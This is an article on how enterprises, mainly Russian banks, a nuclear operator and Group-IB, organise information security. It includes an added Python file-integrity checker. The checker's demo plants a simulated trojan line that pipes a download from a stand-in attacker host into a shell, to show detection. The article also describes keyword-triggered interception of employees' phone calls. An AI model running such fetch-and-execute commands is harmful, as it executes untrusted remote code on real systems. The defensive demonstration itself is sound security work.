Examples of enterprise information security
An enterprise information security system can be organized in several ways: built in-house, handed to an outsourcing company, or modeled on someone else's successful experience. The examples below show how the problem is actually solved in different business sectors.
The main trends in the organization of information security at the enterprise
It is instructive to analyze several cases showing how information security systems have been implemented in Russian banks and companies.
The problem is solved in one of two ways:
- in-house;
- with the involvement of contractors.
In Russia there is a tendency for large corporations to lure leading specialists away from dedicated cybersecurity firms in order to build their own information security model and avoid the data-leakage risks that come with working with contractors. The Central Bank of the Russian Federation warns banks about exactly such risks in a dedicated standard on the rules for working with outsourcers; those rules are just as relevant for any other enterprise.
In choosing software tools for information protection, state policy in support of domestic vendors pushes Russian corporations with state participation, or those actively working on government contracts, to switch to Russian software. Small businesses prefer it for reasons of affordability, reliability and security in narrow information-system niches.
The downside of the import-substitution policy is the lack of a single Russian operating system. With more than 20 existing products addressing tactical rather than strategic goals, companies have to live with the vulnerabilities of Windows and Linux. That attackers know these vulnerabilities well was demonstrated by the WannaCry epidemic, a ransomware worm that stopped factories and hospitals around the world and caused damage estimated in the billions of dollars.
The Digital Economy project provided for the creation of a unified Russian national IoT OS by 2020. It is intended for the Internet of Things and the Industrial Internet; it is supposed to ensure the security of automated process control systems (APCS) and smart homes and to eliminate the risk of attackers entering the network and turning home coffee machines into bots. The result should be “a domestic free operating system for use in all types of cyber-physical systems, surpassing foreign operating systems in key performance parameters, security and fault tolerance”.
Building a threat model
The choice of an information security system depends on the level of risk, and the threat model is usually business driven. Information leaks are the typical threat for telecommunications companies, software developers and medicine; for banks, attempts at unauthorized transfers of funds from customer accounts are more dangerous. Databases not only of banks and mobile operators but also of educational institutions have begun to appear on the darknet.
New malware is created with the participation of military structures. WannaCry spread using an exploit developed by the US National Security Agency and later leaked to the public, and Stuxnet, which targeted Iranian industrial control systems and damaged uranium-enrichment centrifuges, is widely attributed to US and Israeli intelligence services. It can be assumed that a medium-sized enterprise running general-purpose operating systems that offer no high degree of security may at any moment fall victim to a new piece of malware aimed at particular countries or sectors of the economy. According to an Ernst & Young survey of 200 CEOs of the world's largest enterprises, cyber threats will become the top information security threat to the global economy over the next five to ten years.
This means that when developing a security system one should not rely entirely on already implemented examples of enterprise information security; at the basic stage it is necessary to test for all vulnerabilities and eliminate the suspected weaknesses. The main problem is the architecture of the information systems created at many enterprises of the Russian Federation in the 1970s: as the complexity of the software grows, it does not solve the general security problem but closes vulnerabilities with temporary, easily bypassed fixes. Most information systems are weakly protected, and it is not difficult to infect them with malware or break into them. When building one's own security system, the guiding principle should be that the cost of an attack must exceed the attacker's expected gain; market experts insist on this when promoting their solutions.
In 2019, 231 attack campaigns targeting companies and citizens were recorded, with malware and social engineering the most common methods used. In 2018 there were 217 such campaigns, mainly aimed at harvesting passwords and credentials; but after most enterprises and cloud services switched to two-factor authentication, which substantially raises the level of protection, the direction of the threats changed.
Besides cases of introducing a general information security system, it is worth considering new technical solutions that raise the level of protection against leaks. There are software tools on the market for intercepting employees' telephone conversations.
Such a module is built into the office IP telephony system and works on the following principles:
- only conversations involving phone numbers previously entered into a database by the employer are intercepted;
- interception is triggered by keywords; when they are detected, the audio is fully transcribed to text and passed to the security service.
This solution extends the set of channels on which leaks are blocked. As an example of enterprise information security, it illustrates the heightened attention companies pay to employee communication with potential competitors, for instance to hand over a customer database.
Cases of implementation of system solutions for information security
Let us consider examples of enterprise information security from several sectors of the economy in order to see how the trends are reflected in real implementations.
Sberbank and cyber security testing
Among Russian banks, Sberbank was the first to enter the cybersecurity services market, creating the subsidiary BI.Zone. Its tasks include testing the level of protection against cyber threats for banks, telecom operators and IT clients. One of the first companies to go through such testing was MGTS, a Moscow telephone operator that is part of the AFK Sistema group.
The newcomer to the information security market offers testing of communication channels, cybersecurity solutions and technical infrastructure. The testing includes searching for potential vulnerabilities and undeclared functionality in software from foreign and Russian vendors, a service that is not yet customary on the Russian market.
According to the cybersecurity and digital forensics team at KPMG, one of the world's largest consulting firms, most major providers and carriers test their systems themselves. Sberbank's services may be attractive to small banks and companies as part of the overall package it offers them. The creation of this service has also become a tool for researching the market for such services in general and gauging the demand for them.
One of the largest Russian private banks built a fundamentally new information security system in 2012-2013. It no longer meets today's requirements or the regulator's recommendations, but it is interesting as an example of implementing an information security system in an enterprise. Open sources show that the system was developed along general principles, without introducing unique technologies. The implementation was complicated by an extensive network of branches and points of sale, which creates a potential weak spot for attacks on communication channels.
The audit also identified pain points common to systems with a branched architecture:
- most cases of information loss are associated with malfunctions and failures of the software and hardware automation;
- a significant number of external attacks exploit well-known software and OS vulnerabilities.
An additional problem for the bank was the frequent visits of its employees to competitors' websites, which, using tracking software similar in principle to CRM analytics, can not only track and predict visitor behaviour to build their own strategies but also deliver malware.
To solve most of its information security tasks, Alfa-Bank used the following solutions:
- introduction of an advanced user authentication system for the Alfa-Click instant payment service (utilities, telephony) based on technology promoted by A3. The complex includes authentication, authorization and administration facilities; authorization here means that a user of higher rank must confirm another user's actions;
- encryption of all traffic exchanged with clients using current cryptographic information protection tools;
- use of VPN protocols for data transmission;
- separation by firewalls of the network segments in which different processes run;
- content filtering tools that reduce data leaks out of the network and penetration into it via e-mail spam, phishing messages and virus-laden attachments;
- tools for checking the integrity of disk contents;
- network vulnerability scanners and network attack analyzers.
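The list names "tools for checking the integrity of disk contents" without saying how such a check works. The following Python script is an added example and is not Alfa-Bank's code nor any vendor's product; it shows the basic technique behind such tools: record a SHA-256 digest of every file under a directory, sign the baseline with an HMAC key that is kept off the monitored host, and on the next run report files that were added, removed or modified. The signature matters because an attacker who can alter files can usually also rewrite an unsigned baseline stored next to them. The directory, its files, the key and the tampering scenario in demo() are all constructed for the demonstration.

```python
"""File-integrity baseline and verification (added example, not the bank's code)."""
import hashlib
import hmac
import json
import os
import tempfile

CHUNK = 1 << 20  # read files in 1 MiB chunks so large files do not exhaust memory


def file_digest(path):
    """SHA-256 hex digest of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each regular file (path relative to root, '/'-separated) to its digest."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order keeps stored baselines diffable
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks are skipped; their targets are hashed where they live
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = file_digest(full)
    return baseline


def sign_baseline(baseline, key):
    """Serialize the baseline and attach an HMAC-SHA256 tag over the JSON bytes."""
    body = json.dumps(baseline, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return json.dumps({"baseline": baseline, "hmac": tag}, sort_keys=True).encode()


def load_baseline(blob, key):
    """Verify the tag before trusting the stored digests; raise on tampering."""
    doc = json.loads(blob)
    body = json.dumps(doc["baseline"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("baseline HMAC mismatch: stored baseline was altered")
    return doc["baseline"]


def compare(old, new):
    """Report which files were added, removed or changed between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }


def demo():
    """Constructed scenario: baseline a directory, then simulate a compromise."""
    key = b"hypothetical-baseline-key-kept-offline"  # assumption: stored off-host
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "transfer"), "wb") as f:
            f.write(b"#!/bin/sh\necho legitimate payment client\n")
        with open(os.path.join(root, "config.ini"), "wb") as f:
            f.write(b"[core]\nlimit=1000\n")
        blob = sign_baseline(build_baseline(root), key)

        # Simulated compromise: a binary is trojaned and a new file is dropped.
        with open(os.path.join(root, "bin", "transfer"), "ab") as f:
            f.write(b"curl http://attacker.invalid/x | sh\n")
        with open(os.path.join(root, "bin", ".cache"), "wb") as f:
            f.write(b"dropper\n")

        report = compare(load_baseline(blob, key), build_baseline(root))

        # An attacker who edits the baseline without the key is caught as well.
        forged = json.loads(blob)
        forged["baseline"]["bin/.cache"] = file_digest(os.path.join(root, "bin", ".cache"))
        try:
            load_baseline(json.dumps(forged).encode(), key)
            forged_detected = False
        except ValueError:
            forged_detected = True
    return report, forged_detected


if __name__ == "__main__":
    print(demo())
```

In production the baseline and the key live on a separate, write-protected host, the check runs from read-only media or a known-good boot image, and the "modified" list is fed into the incident response process rather than just printed.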
Cisco routers are used as the main hardware for information security protection.
The built-in firewall made it possible to implement:
- context-based access control (CBAC);
- Java applet blocking;
- logging of user actions;
- attack detection and prevention;
- immediate notification of information security incidents.
In addition, the router supports virtual overlay networks, data tunnels, traffic prioritization (QoS), resource reservation and combined routing control methods.
Kaspersky Open Space Security was used as the anti-virus protection for the local networks in 2012-2013, and it continues to be widely used in the banking sector.
The solution makes it possible to:
- protect all types of network nodes;
- implement protection mechanisms against most types of external attacks.
The product is compatible with software from most vendors and is light on network resources. The information protection tools applied made it possible to secure the network at a high level.
Implementation of an information security system at a nuclear power plant (NPP)
Information security specialists at nuclear power plants solve tasks different from those of a bank. The plants are operated by the Rosenergoatom Concern.
The digital transformation of Rosenergoatom began in 2017 with two goals:
- creation of a digital template of NPP operating experience. A unified management tool for NPP systems should make it possible to solve process and risk management problems not only in Russian projects but also in the concern's foreign projects, if their owners are ready to purchase the information product. The solution should be fully ready and integrated with the SAP ERP installed at all 16 energy facilities by the end of 2021;
- transition to a management model within the Russian intelligent energy system (IESD). It will help manage cybersecurity risks at all energy facilities in Russia, from nuclear to hydroelectric power plants. The solution will be implemented on the IoT Energy platform being created within the Digital Economy project.
Work on a unified cybersecurity system for nuclear power plants is being carried out within the Digital Economy project and on the basis of IAEA guidance and Rosenergoatom's own system-level decisions. Until recently the main requirement was to completely exclude any connection of the NPP process control systems (APCS) to the Internet, but the implementation of the IESD project will adjust this policy.
In 2015 more than ten significant cybersecurity incidents were recorded, mainly in the United States, involving outside penetration of NPP networks. They did not lead to accidents, only to massive power outages, which caused significant damage. Given such facts, the communication channels of the NPP APCS must be protected from external connections as far as possible.
From the point of view of studying examples of enterprise information security, it is interesting how the threat model for nuclear power plants is developed in different countries:
- in the United States, a program installed at the facility itself is used to calculate risks and their likelihood;
- the Netherlands brings in external consultants with extensive experience in information security analytics and forecasting;
- some African countries (Zimbabwe) use the Delphi method to identify threats to nuclear infrastructure.
Another feature of cybersecurity risk management at NPPs is that modern software protection tools are considered not safe enough to be introduced into the NPP ICS software environment, so the solution is to isolate that environment from external interference and build the strongest possible perimeter protection. This does not remove the risk of incidents that originate with insiders: phishing e-mails sent to the mailboxes of NPP employees, for example, have become a common attack method. This problem is expected to be addressed by systematic staff training.
Building an information security model from Group-IB
Ilya Sachkov is a Russian cyber threat specialist and the founder of Group-IB. The company is a member of the expert council on Internet security of the European Cybercrime Centre, Europol's division for combating cybercrime. Sachkov has created his own technology for countering DDoS attacks, and its successful practice makes it possible to highlight the key points of introducing an information security system.
The approach is based on three basic factors:
At the prevention level, the task is to build an up-to-date threat model. At the investigation level, forensic programs of the kind used by law enforcement agencies to investigate computer crimes are applied. Even when standard Windows tools failed to prevent the erasure of traces of tampering and one has to find out who stole the data or infected the system with malware, and how, the culprit is identified and evidence is collected to bring the offender to criminal liability.
There are, for instance, interesting examples of investigating DDoS attacks:
- in the first case, the attack was directed at online publications; analysis of the IP addresses from which it was carried out made it possible to identify the topics that had affected someone's interests and to find the customer who ordered it;
- in the second, an attack on an advertising resource turned out to be related to its participation in a large tender: competitors tried to knock it out of the list of contestants.
Based on the results of an investigation, vulnerabilities can be identified and the threat model supplemented or corrected. But not everyone, even seeing the risk, is ready to take decisive measures against cyber threats.
General problems of building an information security system
While large banks and owners of critical information infrastructure facilities know well how to build their own information security model, 40% of Russian companies have no clear strategy in this matter, according to PricewaterhouseCoopers (PwC), one of the world's largest auditing companies.
The following problems were identified:
- almost 50% of Russian companies pay no attention to training employees in the basics of information security;
- 56% of companies refuse to implement an incident response system because they consider it economically inefficient;
- only 19% of companies are confident that their software and hardware would help identify the perpetrator of an incident;
- 25% of companies believe the main risk comes from employees' mobile devices, but are not ready to deploy software solutions to neutralize the threat.
While company leaders are only beginning to think about the need to test for vulnerabilities, the darknet is being replenished with offers to sell data that gives access to already compromised systems.
Experts assume that the threat situation in 2020 will develop in the following directions:
- the realization that an ideal protection system cannot be built will drive growth of the market for SIEM systems, which make it possible to quickly identify incidents and respond to them;
- the hunt for trained personnel will intensify, and companies will invest more in joint programs with universities for training cybersecurity specialists;
- the role of unified state incident management systems (FinCERT, GosSOPKA, IESD) will increase;
- thanks to new forensic technologies, hacker groups that have been quietly controlling company networks for several years will start to be identified;
- the role of operating systems without known vulnerabilities will increase;
- as the security of large companies grows, the number of attacks targeting their suppliers and contractors will increase.
Taking these aspects and the already proven examples of implementing an enterprise information security system into account, a company needs to build its information security strategy for the coming years.